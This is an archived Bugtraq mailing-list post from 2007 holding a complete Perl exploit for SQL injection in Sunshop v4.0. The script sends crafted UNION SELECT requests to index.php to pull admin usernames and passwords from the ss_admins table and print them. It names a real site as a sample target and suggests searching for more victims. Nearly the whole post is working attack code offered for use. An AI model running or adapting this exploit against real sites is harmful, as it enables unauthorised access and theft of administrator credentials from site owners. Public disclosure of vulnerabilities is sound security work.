Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Sunshop v4.0 <= Blind SQL Injection exploit
From: auah () gelap com
Date: 26 Aug 2007 16:44:11 -0000
#!/usr/bin/perl -w
#Sunshop v4.0  <= Blind SQL Injection exploit #Vendor :  http://www.turnkeywebtools.com/  
#Found : iFX a.k.a inversFX
#makaseh buwat kk  :
#  str0ke, Solpot, ibnusina, akukasih, irvian, arioo, Sin~X, Bithedz, r0t0r
#Scr3W_W0rM, Matdhule, home_edition2001, k1tk4t, x-ace, drygol, bluespy all friends :)
#bot pets : sqlscan, xcart, hantu_internet
#and all on #phreakcuy , #nyubicrew, #poet @ irc.mildnet.org , and private chan #noscan
#duh jadi keinget seseorang krn denger lagu kangen band - usai sudah ..... :( , kangen ikz ama temen2 skolah T_T


use LWP::UserAgent;
die "Example: $0 http://victim.com/\n"; unless @ARGV;

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $ARGV[0] . 
"/index.php?l=account&c=1'%20and%201=1%20union%20select%201,substring((select%20substring((substring((select%20substring((select%20concat(char(117,115,101,114,110,97,109,101,58),username,0x2f,char(112,97,115,115,119,111,114,100,58),password,0x2f,char(105,102,120))%20from%20ss_admins%20order%20by%20id%20asc%20limit%201.0),1,255)),1,255)),1,255)),1,255),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*";
$host1 = $ARGV[0] . 
"/index.php?l=account&c=1'%20and%201=1%20union%20select%201,concat(char(117,115,101,114,110,97,109,101,58),username,0x2f,char(112,97,115,115,119,111,114,100,58),password,0x2f,char(105,102,120)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20ss_admins%20order%20by%20id%20asc%20limit%201.0/*";

$res = $b->request(HTTP::Request->new(GET=>$host));
$res1 = $b->request(HTTP::Request->new(GET=>$host1));

$answer = $res->content;
$answer1 = $res1->content;

if ($answer =~ /username:(.*)\/password:(.*)\/ifx/){
        print "\nNih loginna ----[ I  ]\n";
        print "\n[+] Admin username: $1";
        print "\n[+] Admin password: $2";
}
elsif($answer1 =~ /username:(.*)\/password:(.*)\/ifx/)
{
        print "\nNih loginna ----[ II ]\n";
        print "\n[+] Admin username: $1";
        print "\n[+] Admin password: $2";
}
else {
print "maaf nggak jebol cari target laen T_T \n";}

#sample target -> http://www.shpresa-al.com/
#dork : thinkin it out , if magic gpc is on , just try it :P

  By Date           By Thread  

Current thread:
  • Sunshop v4.0 <= Blind SQL Injection exploit auah (Aug 27)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]